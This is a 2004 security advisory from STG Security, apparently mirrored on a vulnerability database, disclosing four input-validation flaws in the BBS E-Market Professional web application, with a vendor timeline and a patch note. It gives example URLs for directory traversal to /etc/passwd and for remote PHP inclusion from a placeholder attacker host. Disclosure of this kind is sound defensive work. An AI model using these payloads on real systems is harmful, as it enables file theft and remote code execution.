bbsEMarket.txt

🗓️ 15 Sep 2004 00:00:00Reported by STG SecurityType

packetstorm🔗 packetstormsecurity.com👁 31 Views

BBS E-Market has multiple vulnerabilities allowing command execution and sensitive data exposure.

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
STG Security Advisory: [SSA-20040915-07]  
BBS E-Market Professional multiple vulnerabilities  
  
Revision 1.0  
Date Published: 2004-09-15 (KST)  
Last Update: 2004-09-15  
Disclosed by SSR Team ([email protected])  
  
  
Abstract  
========  
BBS E-Market(Bobusang in Korean pronunciation) is one of popular  
web Applications used by web-hosting companies and personal  
shopping malls in Korea. It has many features including  
commercial shopping mall, auction and community.  
  
It has multiple vulnerabilities allowing malicious attackers to  
execute arbitrary commands and glean information on  
the targeted system with the privilege of the HTTPD process,  
which is typically run as the nobody user.  
  
Vulnerability Class  
===================  
Implementation Error: Input validation flaw  
  
Details  
=======  
1. Installation path disclosure vulnerability  
Malicious attackers can cause the system to display an  
error message including a installation path.  
  
http://[victim]/bemarket/shop/index.php?pageurl=[any url]  
  
2. File download and user authentication bypass vulnerabilities  
Malicious attackers can download arbitrary files on the  
targeted system with the privilege of the HTTPD process,  
which is typically run as the nobody user.  
  
http://[victim]/becommunity/board/f_down.php?dn_path=  
/../../../../../../../../../[etc]/[passwd]  
  
E-Market community service requires users be authenticated  
to download community files but unauthenticated users can  
download arbitrary files.  
  
3. File disclosure vulnerability  
Malicious attackers can read arbitrary files on the  
targeted system with the privilege of the HTTPD process,  
which is typically run as the nobody user.  
  
http://[victim]/bemarket/shop/index.php?pageurl=viewpage&  
filename=../../../../../../../../[etc]/[passwd]  
  
4. Malicious php source injection vulnerability  
Malicious attackers can run arbitrary command on the  
targeted system with the privilege of the HTTPD process,  
which is typically run as the nobody user.  
  
http://[victim]/becommunity/community/index.php?pageurl=  
[http://attacker/malicious php source]  
  
Impact  
======  
Very High and Urgent.  
Indonesian security community has already disclosed some  
vulnerabilities of E-Market application.  
http://echo.or.id/adv/adv06-y3dips-2004.txt  
  
Solution  
=========  
Apply patch.  
Current patch level is bf_140 (v1.4.0) and not vulnerable.  
  
  
Affected Products  
================  
BBS E-Market patch level bf_130 (v1.3.0) and prior  
  
Vendor Status: FIXED  
=======================  
2004-07-09 Jeong Jin-Seok found the vulnerabilities.  
2004-07-09 NTSoft,Inc. notified.  
2004-07-09 E-Market developer confirmed.  
2004-07-23 A patch released to their customers.  
2004-09-07 y3dips at echo.or.id released some vulnerabilities.  
2004-09-15 Official release.  
  
Credits  
======  
Jeong Jin-Seok at STG Security   
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.0  
  
iQA/AwUBQUgW3T9dVHd/hpsuEQLQTwCgwNhcIaV/JUst8YfwfPK1CgjcXBQAoPYu  
cJDOfVf4JHUzKiki5I1wNNFr  
=gL5x  
-----END PGP SIGNATURE-----  
`

15 Sep 2004 00:00Current

7.4High risk

Vulners AI Score7.4